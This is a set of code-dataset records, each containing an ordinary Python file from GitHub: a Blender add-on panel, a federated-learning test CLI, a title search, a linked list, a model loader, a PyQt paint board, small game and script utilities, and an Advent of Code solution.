bl_label = \"Output\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n bl_options = {'DEFAULT_CLOSED'}\n\n def draw(self, context):\n layout = self.layout\n\n ezb_settings = context.scene.EZB_Settings\n if not(context.scene.EZB_Settings.baker_index < len(ezb_settings.bakers) and len(ezb_settings.bakers) > 0):\n layout.label(text='Select or create a Baker in the \"Bakers\" panel')\n return\n\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n\n if not baker.materials:\n layout.label(text='Bake in the \"Bakers\" panel to see the output images in this panel')\n return\n col = layout.column()\n for x in baker.materials:\n x.draw(col, context)\n\n\nclasses = [\n EZB_preview_group_object,\n EZB_Settings,\n EZB_UL_bakers,\n EZB_UL_bake_groups,\n EZB_PT_core_panel,\n EZB_PT_baker_panel,\n EZB_PT_baker_settings_panel,\n EZB_PT_bake_groups_panel,\n EZB_PT_maps_panel,\n EZB_PT_output_panel,\n EZB_UL_preview_group_objects,\n EZB_UL_preview_group_objects_low\n]\n\n\ndef register():\n outputs.register()\n operators.register()\n devices.register()\n bake_group.register()\n baker.register()\n\n from bpy.utils import register_class\n\n for cls in classes:\n register_class(cls)\n\n bpy.types.Scene.EZB_Settings = bpy.props.PointerProperty(type=EZB_Settings)\n\n handlers.register()\n\n\ndef unregister():\n from bpy.utils import unregister_class\n\n handlers.unregister()\n\n for cls in reversed(classes):\n unregister_class(cls)\n\n del bpy.types.Scene.EZB_Settings\n\n baker.unregister()\n bake_group.unregister()\n operators.unregister()\n devices.unregister()\n outputs.unregister()\n","repo_name":"eastinGroup/ez_baker","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":14364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26899065155","text":"import time\n\nimport click\n\nfrom flow_client.flow_cli.utils import cli_args\nfrom flow_client.flow_cli.utils.cli_utils import prettify\nfrom flow_sdk.client import FlowClient\n\nfrom pipeline.backend.pipeline import PipeLine\nfrom pipeline.component import (\n DataTransform, Evaluation, HeteroLR,\n HeteroSecureBoost, Intersection, Reader,\n)\nfrom pipeline.interface import Data\n\n\n@click.group(short_help=\"FATE Flow Test Operations\")\n@click.pass_context\ndef test(ctx):\n \"\"\"\n \\b\n Provides numbers of component operational commands, including metrics, parameters and etc.\n For more details, please check out the help text.\n \"\"\"\n pass\n\n\n@test.command(\"toy\", short_help=\"Toy Test Command\")\n@cli_args.GUEST_PARTYID_REQUIRED\n@cli_args.HOST_PARTYID_REQUIRED\n@cli_args.TIMEOUT\n@cli_args.TASK_CORES\n@click.pass_context\ndef toy(ctx, **kwargs):\n flow_sdk = FlowClient(ip=ctx.obj[\"ip\"], port=ctx.obj[\"http_port\"], version=ctx.obj[\"api_version\"],\n app_key=ctx.obj.get(\"app_key\"), secret_key=ctx.obj.get(\"secret_key\"))\n submit_result = flow_sdk.test.toy(**kwargs)\n if submit_result[\"retcode\"] == 0:\n for t in range(kwargs[\"timeout\"]):\n job_id = submit_result[\"jobId\"]\n r = flow_sdk.job.query(job_id=job_id, role=\"guest\", party_id=kwargs[\"guest_party_id\"])\n if r[\"retcode\"] == 0 and len(r[\"data\"]):\n job_status = r[\"data\"][0][\"f_status\"]\n print(f\"toy test job {job_id} is {job_status}\")\n if job_status in {\"success\", \"failed\", \"canceled\"}:\n check_log(flow_sdk, kwargs[\"guest_party_id\"], job_id, job_status)\n break\n time.sleep(1)\n else:\n print(f\"check job status 
timeout\")\n check_log(flow_sdk, kwargs[\"guest_party_id\"], job_id, job_status)\n else:\n prettify(submit_result)\n\n\ndef check_log(flow_sdk, party_id, job_id, job_status):\n r = flow_sdk.job.log(job_id=job_id, output_path=\"./logs/toy\")\n if r[\"retcode\"] == 0:\n log_msg = flow_sdk.test.check_toy(party_id, job_status, r[\"directory\"])\n try:\n for msg in log_msg:\n print(msg)\n except BaseException:\n print(f\"auto check log failed, please check {r['directory']}\")\n else:\n print(f\"get log failed, please check PROJECT_BASE/logs/{job_id} on the fateflow server machine\")\n\n\n@test.command(\"min\", short_help=\"Min Test Command\")\n@click.option(\"-t\", \"--data-type\", type=click.Choice([\"fast\", \"normal\"]), default=\"fast\", show_default=True,\n help=\"fast for breast data, normal for default credit data\")\n@click.option(\"--sbt/--no-sbt\", is_flag=True, default=True, show_default=True, help=\"run sbt test or not\")\n@cli_args.GUEST_PARTYID_REQUIRED\n@cli_args.HOST_PARTYID_REQUIRED\n@cli_args.ARBITER_PARTYID_REQUIRED\n@click.pass_context\ndef run_min_test(ctx, data_type, sbt, guest_party_id, host_party_id, arbiter_party_id, **kwargs):\n guest_party_id = int(guest_party_id)\n host_party_id = int(host_party_id)\n arbiter_party_id = int(arbiter_party_id)\n\n if data_type == \"fast\":\n guest_train_data = {\"name\": \"breast_hetero_guest\", \"namespace\": \"experiment\"}\n host_train_data = {\"name\": \"breast_hetero_host\", \"namespace\": \"experiment\"}\n auc_base = 0.98\n elif data_type == \"normal\":\n guest_train_data = {\"name\": \"default_credit_hetero_guest\", \"namespace\": \"experiment\"}\n host_train_data = {\"name\": \"default_credit_hetero_host\", \"namespace\": \"experiment\"}\n auc_base = 0.69\n else:\n click.echo(f\"data type {data_type} not supported\", err=True)\n raise click.Abort()\n\n lr_pipeline = lr_train_pipeline(guest_party_id, host_party_id, arbiter_party_id, guest_train_data, host_train_data)\n lr_auc = get_auc(lr_pipeline, \"hetero_lr_0\")\n\n if lr_auc < auc_base:\n click.echo(f\"Warning: The LR auc {lr_auc} is lower than expect value {auc_base}\")\n\n predict_pipeline(lr_pipeline, guest_party_id, host_party_id, guest_train_data, host_train_data)\n\n if sbt:\n sbt_pipeline = sbt_train_pipeline(guest_party_id, host_party_id, guest_train_data, host_train_data)\n sbt_auc = get_auc(sbt_pipeline, \"hetero_secureboost_0\")\n\n if sbt_auc < auc_base:\n click.echo(f\"Warning: The SBT auc {sbt_auc} is lower than expect value {auc_base}\")\n\n predict_pipeline(sbt_pipeline, guest_party_id, host_party_id, guest_train_data, host_train_data)\n\n\ndef lr_train_pipeline(guest, host, arbiter, guest_train_data, host_train_data):\n pipeline = PipeLine().set_initiator(role=\"guest\", party_id=guest).set_roles(guest=guest, host=host, arbiter=arbiter)\n\n reader_0 = Reader(name=\"reader_0\")\n reader_0.get_party_instance(role=\"guest\", party_id=guest).component_param(table=guest_train_data)\n reader_0.get_party_instance(role=\"host\", party_id=host).component_param(table=host_train_data)\n\n data_transform_0 = DataTransform(name=\"data_transform_0\")\n data_transform_0.get_party_instance(role=\"guest\", party_id=guest).component_param(\n with_label=True, output_format=\"dense\")\n data_transform_0.get_party_instance(role=\"host\", party_id=host).component_param(with_label=False)\n\n intersection_0 = Intersection(name=\"intersection_0\")\n\n lr_param = {\n \"penalty\": \"L2\",\n \"tol\": 0.0001,\n \"alpha\": 0.01,\n \"optimizer\": \"rmsprop\",\n \"batch_size\": -1,\n 
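# a batch_size of -1 means full-batch training (no mini-batching)\n        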
\"learning_rate\": 0.15,\n \"init_param\": {\n \"init_method\": \"zeros\",\n \"fit_intercept\": True,\n },\n \"max_iter\": 30,\n \"early_stop\": \"diff\",\n \"encrypt_param\": {\n \"key_length\": 1024,\n },\n \"cv_param\": {\n \"n_splits\": 5,\n \"shuffle\": False,\n \"random_seed\": 103,\n \"need_cv\": False,\n },\n \"validation_freqs\": 3,\n }\n hetero_lr_0 = HeteroLR(name=\"hetero_lr_0\", **lr_param)\n\n evaluation_0 = Evaluation(name=\"evaluation_0\", eval_type=\"binary\")\n\n pipeline.add_component(reader_0)\n pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))\n pipeline.add_component(intersection_0, data=Data(data=data_transform_0.output.data))\n pipeline.add_component(hetero_lr_0, data=Data(train_data=intersection_0.output.data))\n pipeline.add_component(evaluation_0, data=Data(data=hetero_lr_0.output.data))\n\n pipeline.compile()\n pipeline.fit()\n\n return pipeline\n\n\ndef sbt_train_pipeline(guest, host, guest_train_data, host_train_data):\n pipeline = PipeLine().set_initiator(role=\"guest\", party_id=guest).set_roles(guest=guest, host=host)\n\n reader_0 = Reader(name=\"reader_0\")\n reader_0.get_party_instance(role=\"guest\", party_id=guest).component_param(table=guest_train_data)\n reader_0.get_party_instance(role=\"host\", party_id=host).component_param(table=host_train_data)\n\n data_transform_0 = DataTransform(name=\"data_transform_0\")\n data_transform_0.get_party_instance(role=\"guest\", party_id=guest).component_param(\n with_label=True, output_format=\"dense\")\n data_transform_0.get_party_instance(role=\"host\", party_id=host).component_param(with_label=False)\n\n intersection_0 = Intersection(name=\"intersection_0\")\n\n sbt_param = {\n \"task_type\": \"classification\",\n \"objective_param\": {\n \"objective\": \"cross_entropy\",\n },\n \"num_trees\": 3,\n \"validation_freqs\": 1,\n \"encrypt_param\": {\n \"method\": \"paillier\",\n \"key_length\": 1024\n },\n \"tree_param\": {\n \"max_depth\": 3,\n }\n }\n hetero_secure_boost_0 = HeteroSecureBoost(name=\"hetero_secureboost_0\", **sbt_param)\n\n evaluation_0 = Evaluation(name=\"evaluation_0\", eval_type=\"binary\")\n\n pipeline.add_component(reader_0)\n pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))\n pipeline.add_component(intersection_0, data=Data(data=data_transform_0.output.data))\n pipeline.add_component(hetero_secure_boost_0, data=Data(train_data=intersection_0.output.data))\n pipeline.add_component(evaluation_0, data=Data(data=hetero_secure_boost_0.output.data))\n\n pipeline.compile()\n pipeline.fit()\n\n return pipeline\n\n\ndef get_auc(pipeline, component_name):\n cpn_summary = pipeline.get_component(component_name).get_summary()\n auc = cpn_summary.get(\"validation_metrics\").get(\"train\").get(\"auc\")[-1]\n return auc\n\n\ndef predict_pipeline(train_pipeline, guest, host, guest_train_data, host_train_data):\n cpn_list = train_pipeline.get_component_list()[1:]\n train_pipeline.deploy_component(cpn_list)\n\n pipeline = PipeLine()\n reader_0 = Reader(name=\"reader_0\")\n reader_0.get_party_instance(role=\"guest\", party_id=guest).component_param(table=guest_train_data)\n reader_0.get_party_instance(role=\"host\", party_id=host).component_param(table=host_train_data)\n pipeline.add_component(reader_0)\n pipeline.add_component(train_pipeline, data=Data(predict_input={\n train_pipeline.data_transform_0.input.data: reader_0.output.data}))\n 
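# run the deployed training components on the new reader's data\n    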
pipeline.predict()\n","repo_name":"FederatedAI/FATE","sub_path":"python/fate_client/flow_client/flow_cli/commands/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":9076,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"41988297359","text":"from sqlalchemy import sql\n\nfrom app import db\nfrom pub import Pub\n\n\ndef fulltext_search_title(query, is_oa=None, page=1):\n if query:\n query = query.replace('\\0', '')\n\n oa_clause = 'true' if is_oa is None else 'response_is_oa' if is_oa else 'not response_is_oa'\n\n query_statement = sql.text('''\n with matches as materialized (\n select id, title, query, response_is_oa\n from pub, websearch_to_tsquery('english', :search_str) query\n where to_tsvector('english', title) @@ query\n limit 1000\n )\n select\n id,\n ts_headline('english', title, query),\n ts_rank_cd(to_tsvector('english', title), query, 1) as rank\n from matches\n where {oa_clause}\n order by rank desc limit 50 offset {offset}\n ;'''.format(oa_clause=oa_clause, offset=int(page-1)*50))\n\n rows = db.engine.execute(query_statement.bindparams(search_str=query)).fetchall()\n search_results = {row[0]: {'snippet': row[1], 'score': row[2]} for row in rows}\n\n cached_responses = [p[0] for p in db.session.query(Pub.response_jsonb).filter(Pub.id.in_(list(search_results.keys()))).all()]\n\n if is_oa:\n oa_filter = lambda r: r['is_oa']\n elif is_oa is None:\n oa_filter = lambda r: True\n else:\n oa_filter = lambda r: not r['is_oa']\n\n filtered_responses = [\n {\n 'response': response,\n 'snippet': search_results[response['doi']]['snippet'],\n 'score': search_results[response['doi']]['score'],\n }\n for response in cached_responses if oa_filter(response)\n ][0:50]\n\n return sorted(filtered_responses, key=lambda r: r['score'], reverse=True)\n\ndef autocomplete_phrases(query):\n query_statement = sql.text(r\"\"\"\n with s as (SELECT id, lower(title) as lower_title FROM pub_2018 WHERE title iLIKE :p0)\n select match, count(*) as score from (\n SELECT regexp_matches(lower_title, :p1, 'g') as match FROM s\n union all\n SELECT regexp_matches(lower_title, :p2, 'g') as match FROM s\n union all\n SELECT regexp_matches(lower_title, :p3, 'g') as match FROM s\n union all\n SELECT regexp_matches(lower_title, :p4, 'g') as match FROM s\n ) s_all\n group by match\n order by score desc, length(match::text) asc\n LIMIT 50;\"\"\").bindparams(\n p0='%{}%'.format(query),\n p1=r'({}\\w*?\\M)'.format(query),\n p2=r'({}\\w*?(?:\\s+\\w+){{1}})\\M'.format(query),\n p3=r'({}\\w*?(?:\\s+\\w+){{2}})\\M'.format(query),\n p4=r'({}\\w*?(?:\\s+\\w+){{3}}|)\\M'.format(query)\n )\n\n rows = db.engine.execute(query_statement).fetchall()\n phrases = [{\"phrase\":row[0][0], \"score\":row[1]} for row in rows if row[0][0]]\n return phrases","repo_name":"ourresearch/oadoi","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":255,"dataset":"github-code","pt":"53"} +{"seq_id":"33447391377","text":"#!/usr/bin/env python3\nfrom typing import Optional, Union\n\n\nclass SLLNode():\n \"\"\"A node of a singly-linked list.\"\"\"\n\n def __init__(self, node_data, next_node=None):\n self.data = node_data\n self.next = next_node\n\n\nclass SinglyLinkedList():\n \"\"\"A data structure where parent elements hold a reference to a child.\n\n The child elements do not hold references to the parent, so this structure\n can only be iterated through forwards.\n \"\"\"\n head, 
tail = None, None  # a bare `head, tail = None` would raise TypeError when the class body runs; the tail property below shadows this default\n    def __init__(self, head=None):\n        if isinstance(head, SLLNode) or head is None:\n            # keep an empty list's head as None instead of wrapping None in a node\n            self.head = head\n        else:\n            self.head = SLLNode(head)\n\n    def __len__(self) -> int:\n        \"\"\"Determine how long the list is.\"\"\"\n        length = 0\n        if self.head:\n            length, element = 1, self.head\n            while element.next is not None:\n                length += 1\n                element = element.next\n        return length\n\n    def __bool__(self):\n        \"\"\"Return true if the list is not empty.\"\"\"\n        return self.head is not None\n\n    @property\n    def tail(self):\n        \"\"\"The last node in the list\"\"\"\n        return get_tail_of(self.head)\n\n    def list_elements(\n        self,\n        # forward reference: the class name isn't bound yet inside its own body\n        list_or_node: Optional[Union[\"SinglyLinkedList\", SLLNode]] = None\n    ):\n        \"\"\"Print all elements of this or a specified list to stdout\"\"\"\n        if list_or_node is None:\n            if self.head:\n                self.list_elements_of(self.head)\n            else:\n                print(\"Empty list.\")\n        else:\n            self.list_elements_of(list_or_node)\n\n    @staticmethod\n    def list_elements_of(\n        list_or_node: Optional[Union[\"SinglyLinkedList\", SLLNode]] = None\n    ):\n        \"\"\"Print all elements of the specified list to stdout.\"\"\"\n        if list_or_node is None:\n            print(\"Empty list.\")\n        if isinstance(list_or_node, SinglyLinkedList):\n            SinglyLinkedList.list_elements_of(list_or_node.head)\n            return\n        if isinstance(list_or_node, SLLNode):\n            print(list_or_node.data)\n            element = list_or_node\n            while element.next:\n                element = element.next\n                print(element.data)\n\n    @staticmethod\n    def prepend_to(original_list, list_or_data=None):\n        \"\"\"Prepend a node or data to the given list.\n\n        list_or_data can be anything. If it's a SinglyLinkedList or SLLNode,\n        the original_list gets attached to its tail and it's returned.\n        Otherwise, a new node is created and the original list is appended to\n        it.\n\n        original_list must be a SinglyLinkedList or SLLNode. 
A TypeError will\n        be raised on any other input.\n        list_or_data This can be a SinglyLinkedList, a SLLNode, or raw data\n                     to be put in an SLLNode.\n\n        Returns a SinglyLinkedList.\n        May raise a TypeError.\n        \"\"\"\n        if isinstance(original_list, SinglyLinkedList):\n            return SinglyLinkedList.prepend_to(\n                original_list.head, list_or_data\n            )\n        elif isinstance(original_list, SLLNode):\n            # do actual stuff\n            if isinstance(list_or_data, SLLNode):\n                newList = SinglyLinkedList(list_or_data)\n                # both values are SLLNodes representing their respective heads\n                newList.tail.next = original_list\n                return newList\n            elif isinstance(list_or_data, SinglyLinkedList):\n                return SinglyLinkedList.prepend_to(\n                    original_list, list_or_data.head\n                )\n            else:\n                return SinglyLinkedList.prepend_to(\n                    original_list, SLLNode(list_or_data)\n                )\n        else:\n            raise TypeError(\n                \"The original list should be a SinglyLinkedList or SLLNode, \"\n                f\"got {original_list} of type {type(original_list)}\")\n\n    def prepend(self, data):\n        \"\"\"Add a new element at the beginning of the list.\"\"\"\n        if isinstance(data, SLLNode):\n            get_tail_of(data).next = self.head\n            self.head = data\n        else:\n            self.prepend(SLLNode(data))\n\n    def append(self, data):\n        \"\"\"Add a new element to the end of the list.\"\"\"\n        if isinstance(data, SLLNode):\n            # the received data is actually a node.\n            if self.head:\n                self.tail.next = data\n            else:\n                self.head = data\n        else:\n            self.append(SLLNode(data))\n\n    @staticmethod\n    def append_to(original_list, list_or_data):\n        \"\"\"Static version of append() which returns the modified list.\"\"\"\n        if isinstance(original_list, SinglyLinkedList):\n            return SinglyLinkedList.append_to(\n                original_list.head, list_or_data)\n        elif isinstance(original_list, SLLNode):\n            if isinstance(list_or_data, SinglyLinkedList):\n                # append the other list's chain, not the wrapper object\n                return SinglyLinkedList.append_to(\n                    original_list, list_or_data.head)\n            elif isinstance(list_or_data, SLLNode):\n                # attach the new node after the original list's tail\n                new_list = SinglyLinkedList(original_list)\n                new_list.tail.next = list_or_data\n                return new_list\n            else:\n                return SinglyLinkedList.append_to(\n                    original_list, SLLNode(list_or_data)\n                )\n        else:\n            raise TypeError(\n                \"original_list must be a SinglyLinkedList or SLLNode. \"\n                f\"Received {original_list} of type {type(original_list)}\")\n\n    def insert(self, data, position: int):\n        \"\"\"Insert the given data at the given index of this list.\"\"\"\n        if isinstance(data, SLLNode):\n            index: int = 0\n            old_list: SinglyLinkedList = SinglyLinkedList(self.head)\n            working_node: SLLNode = old_list.head\n            self.head = None\n            while index < position:\n                if not working_node.next:\n                    raise ValueError(\n                        f\"The requested position ({position}) is longer than\"\n                        f\" the total length of the list ({index}).\"\n                    )\n                index += 1\n                self.append(working_node.data)\n                working_node = working_node.next\n            self.append(data)\n            self.append(working_node)  # reattach the rest of the original chain\n        elif isinstance(data, SinglyLinkedList):\n            # forward the position; elif prevents re-inserting a node that was just handled\n            self.insert(data.head, position)\n        else:\n            self.insert(SLLNode(data), position)\n\n    @staticmethod\n    def insert_into(old_list, data, position: int):\n        \"\"\"Get a new list with the given data inserted into the given list.\"\"\"\n        assert isinstance(old_list, SinglyLinkedList)\n        if isinstance(data, SLLNode):\n            index, new_list = 0, SinglyLinkedList()\n            working_node = old_list.head\n            while index < position:\n                if not working_node.next:\n                    raise ValueError(\n                        f\"The requested position ({position}) is longer than\"\n                        f\" the total length of the list ({index}).\"\n                    )\n                index += 1\n                new_list.append(working_node.data)\n                working_node = working_node.next\n            new_list.append(data)\n            new_list.append(working_node)\n            return new_list\n        if isinstance(data, SinglyLinkedList):\n            return SinglyLinkedList.insert_into(old_list, data.head, position)\n        else:\n            return SinglyLinkedList.insert_into(\n                old_list, SLLNode(data), position)\n\n    def delete_by_index(self, index):\n        \"\"\"Delete an element by its position in the list.\"\"\"\n        self.head = delete_from_head_by_index(self.head, index).head\n\n    def delete_by_value(self, value):\n        \"\"\"Delete all of the elements that match the value specified.\"\"\"\n        self.head = delete_from_head_by_value(self.head, value).head\n\n\ndef delete_from_list_by_index(linked_list, index):\n    \"\"\"Delete the element at the given position from the given list.\"\"\"\n    return delete_from_head_by_index(linked_list.head, index)\n\n\ndef delete_from_head_by_index(head, index):\n    assert isinstance(index, int)\n    assert index >= 0\n    out = SinglyLinkedList()\n    working_node = head\n    working_index = 0\n    while working_node is not None:\n        if working_index != index:\n            # copy the value rather than the node so the old chain isn't dragged along\n            out.append(working_node.data)\n        working_index += 1\n        working_node = working_node.next\n    return out\n\n\ndef delete_from_list_by_value(linked_list, value):\n    \"\"\"Delete all the values from the list that match the value.\"\"\"\n    return delete_from_head_by_value(linked_list.head, value)\n\n\ndef delete_from_head_by_value(head, value):\n    \"\"\"Delete all the instances of the value in the list at head.\"\"\"\n    assert isinstance(value, int)\n    out = SinglyLinkedList()\n    working_node = head\n    while working_node is not None:\n        if working_node.data != value:\n            out.append(working_node.data)\n        working_node = working_node.next\n    return out\n\n\ndef get_tail_of(head: Optional[SLLNode]) -> Optional[SLLNode]:\n    \"\"\"Return the last element of a linked list given the first.\"\"\"\n    if head:\n        element = head\n        while element.next:\n            element = element.next\n        return element\n    return None  # received head was none.\n","repo_name":"dscottboggs/practice","sub_path":"HackerRank/LinkedLists/src/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":9383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"23322777515","text":"import 
joblib\nfrom mdclogpy import Logger\nimport tensorflow as tf\n\nlogger = Logger(name=__name__)\n\n\nclass ModelLoad(object):\n    \"\"\"Load the model if it exists in the ./src directory\n    \n    Args:\n        tfLite (bool): Whether the saved model is TensorFlow Lite. True if it was saved as .tflite, False if it was saved as .h5.\n    \"\"\"\n\n    def __init__(self, tfLite = True):\n        \"\"\"Initialize the ModelLoad instance.\n        \n        Args:\n            tfLite (bool): Whether the saved model is TensorFlow Lite. True if it was saved as .tflite, False if it was saved as .h5.\n        \"\"\"\n        self.tfLite = tfLite\n        self.load_model()\n        self.load_scale()\n    \n    def load_model(self):\n        \"\"\"Load either the TF Lite or the Keras model, depending on how it was saved in the ./src directory\"\"\"\n        \n        try:\n            if self.tfLite:\n                self.tfLite = True\n                self.model = tf.lite.Interpreter(model_path='./src/model.tflite')\n                self.model.allocate_tensors()\n            else:\n                self.tfLite = False\n                self.model = tf.keras.models.load_model('./src/model.h5')\n        except FileNotFoundError:\n            logger.error(\"Model does not exist\")\n\n    def load_scale(self):\n        \"\"\"Load the scaler that was stored by the normalization step\"\"\"\n        \n        try:\n            with open('./src/scale', 'rb') as f:\n                self.scale = joblib.load(f)\n        except FileNotFoundError:\n            logger.error(\"Scale file does not exist\")\n\n    def predict(self, inputs):\n        \"\"\"Prediction function from dataframe arguments.\n\n        Args:\n            inputs (DataFrame): The data to predict on, as a pandas DataFrame.\n        \"\"\"\n        \n        pred = None\n        if self.tfLite:\n            input_details = self.model.get_input_details()\n            output_details = self.model.get_output_details()\n            self.model.set_tensor(input_details[0]['index'], inputs)\n            self.model.invoke()\n            pred = self.model.get_tensor(output_details[0]['index'])\n        else:\n            pred = self.model.predict(inputs)\n        pred = self.scale.inverse_transform(pred)\n        return pred\n","repo_name":"NTUST-BMW-Lab/traffic-steering-xApp","sub_path":"src/model_load.py","file_name":"model_load.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"23526343198","text":"import sys\n\nfrom PyQt5.QtWidgets import QWidget, QLabel, QApplication\nfrom PyQt5.QtCore import QSize, Qt, QPoint\nfrom PyQt5.QtGui import QPixmap, QColor, QPainter, QPen\n\n\nclass PaintBoard(QWidget):\n    def __init__(self, Parent = None, size = QSize(320, 240), fill_bg_color = QColor(255, 255, 255, 255)):\n        super().__init__(Parent)\n        self.__size = size\n        self.__fill = fill_bg_color\n\n        # create the canvas\n        self.__board = QPixmap(self.__size)\n        self.__board.fill(self.__fill)\n\n        # create the painter\n        self.__painter = QPainter()\n        # initialize the pen's start and end points\n        self.__begin_point = QPoint()\n        self.__end_point = QPoint()\n\n        # other drawing-related settings\n        self.__thickness = 18   # default pen thickness\n        self.__penColor = QColor(0, 0, 0, 255)  # default pen color\n\n        # set QWidget parameters\n        self.setFixedSize(self.__size)\n\n    def getContentAsQImage(self):\n        image = self.__board.toImage()\n        return image\n\n    def setBoardFill(self, fill):\n        self.__fill = fill\n        self.__board.fill(fill)\n        self.update()\n\n    # set the pen color\n    def setPenColor(self, color):\n        self.__penColor = color\n\n    # set the pen thickness\n    def setPenThickness(self, thickness=10):\n        self.__thickness = thickness\n\n    # the methods below are all overrides\n\n    # without this, every stroke would be joined to the previous one: the start point would always be the end of the last stroke instead of the position currently pressed\n    def mousePressEvent(self,event):\n        if event.button() == Qt.LeftButton:\n            self.__begin_point = event.pos()\n            self.__end_point = event.pos()\n\n    def paintEvent(self, e):\n        # QPainter's begin() starts painting; its argument tells it where to paint, in this case on this QWidget\n        # once .begin() is called, all QPainter-related settings are reset\n        self.__painter.begin(self)\n        # the overload .drawPixmap(x, y, pm) draws pm at position (x, y)\n        self.__painter.drawPixmap(0, 0, self.__board)\n        self.__painter.end()\n\n    def mouseMoveEvent(self, e):\n        if e.buttons() == Qt.LeftButton:\n            self.__end_point = e.pos()\n\n            self.__painter.begin(self.__board)\n            self.__painter.setPen(QPen(self.__penColor, self.__thickness))\n            self.__painter.drawLine(self.__begin_point, self.__end_point)\n            self.__painter.end()\n\n            self.__begin_point = self.__end_point\n            self.update()\n\n\n    def Clear(self):\n        self.__board.fill(self.__fill)\n        self.update()\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    window = PaintBoard()\n    window.show()\n    sys.exit(app.exec_())\n","repo_name":"momo4826/digit_recognizer_with_gui","sub_path":"gui/paintboard.py","file_name":"paintboard.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"21824980028","text":"\n\nclass ScriptInterpreter():\n    def __init__(self):\n        self._lines = []\n        self._scenelist = []\n        self._currentactor = []\n        self._castlist = {}\n\n    def set_script(self, script):\n        \"\"\"Takes a filename, formatted to the linenotes3js specifications, and creates a list containing every line in the file\"\"\"\n        with open(script, \"r\") as newfile:\n            self._lines = newfile.readlines()\n        self._scenelist = [i for i in self._lines if i[0] == \"$\"]\n\n    def set_cast_list(self, castlist, reset=False):\n        \"\"\"Takes a filename with lines formatted as \"ACTOR:ROLE\" and writes the contents into a dictionary\"\"\"\n        if reset: \n            self._castlist = {}\n        with open(castlist, \"r\") as castfile:\n            for line in castfile.readlines():\n                splitline = line.split(\":\")\n                self._castlist[splitline[1].strip()] = splitline[0]  # strip the trailing newline from the role name\n        \n\n    \n\n    \n\n    \n    \n\n\n    ","repo_name":"yodasodabob/LineNotes","sub_path":"lineNotes3.py","file_name":"lineNotes3.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"39752762137","text":"\r\nimport time\r\n\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\nfrom locals import *\r\nfrom graphics import *\r\nfrom deskobject import DeskObject\r\nfrom igoto import IGoto\r\n\r\nclass Message(IGoto):\r\n    def __init__(self, msg, group, pool):\r\n        IGoto.__init__(self)\r\n        self.group = group\r\n        self.pool = pool\r\n        \r\n        # set image\r\n        self.image = pygame.Surface((200,MESSAGE_HEIGHT))\r\n        self.image.fill((0,0,0))\r\n        draw_text(self.image, msg, (5,3), fg=(255,255,0), bg=None)\r\n        \r\n        # set rect\r\n        self.rect = self.image.get_rect()\r\n        self.rect.topleft = pos_message\r\n        self.old_rect = pygame.Rect(self.rect)\r\n        \r\n        self.birth = time.time()\r\n        self.life = MESSAGE_LIFE\r\n        self.zindex = MESSAGE_ZINDEX\r\n        \r\n    def update(self):\r\n        if time.time() - self.birth > self.life:\r\n            self.remove_dirty = True\r\n        else:\r\n            IGoto.update(self)\r\n        \r\n    def removecallback(self):\r\n        self.pool.remove(self)\r\n        self.group.remove(self)\r\n        \r\n    def sendmsg(self, msg, game):\r\n        pass","repo_name":"xebecnan/our-gathering","sub_path":"src/client/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"13711816393","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 3 00:19:41 2019\n\n@author: john\n\"\"\"\n# 
read in input\nwith open('input.txt') as f:\n    infile = f.readlines()\n\n# make it into two nice, easy lists of steps\nwire1 = infile[0].split(',')\nwire2 = infile[1].split(',')\n\ndef intersect_finder(wire1, wire2):\n    # set up coordinate lists\n    coords_w1 = []\n    coords_w2 = []\n\n    # set up starting points\n    x1 = 0\n    y1 = 0\n    x2 = 0\n    y2 = 0\n\n    # loop through wire, adding the new coordinates to the list\n    for d in wire1:\n        w = d[0] # the direction to go\n        n = int(d[1:]) # the number of steps\n        for i in range(n):\n            if w == 'R':\n                x1 += 1\n                coords_w1.append([x1,y1])\n            elif w == 'L':\n                x1 -= 1\n                coords_w1.append([x1,y1])\n            elif w == 'U':\n                y1 += 1\n                coords_w1.append([x1,y1])\n            elif w == 'D':\n                y1 -= 1\n                coords_w1.append([x1,y1])\n\n    # same for wire 2\n    for d in wire2:\n        w = d[0]\n        n = int(d[1:])\n        for i in range(n):\n            if w == 'R':\n                x2 += 1\n                coords_w2.append([x2,y2])\n            elif w == 'L':\n                x2 -= 1\n                coords_w2.append([x2,y2])\n            elif w == 'U':\n                y2 += 1\n                coords_w2.append([x2,y2])\n            elif w == 'D':\n                y2 -= 1\n                coords_w2.append([x2,y2])\n\n    # intersecting pts are the coords that\n    # are in both lists\n    intersections = [i for i in coords_w1 if i in coords_w2]\n    \n    # Manhattan distances of intersections\n    distances = [abs(c[0])+abs(c[1]) for c in intersections]\n    p1 = min(distances)\n\n    # use index to find the number of steps to reach each point\n    steps = [coords_w1.index(i) + coords_w2.index(i) + 2 for i in intersections]\n    p2 = min(steps)\n    return p1, p2\n\npart1, part2 = intersect_finder(wire1,wire2)\nprint(\"Part 1 answer: \" + str(part1))\nprint(\"Part 2 answer: \" + 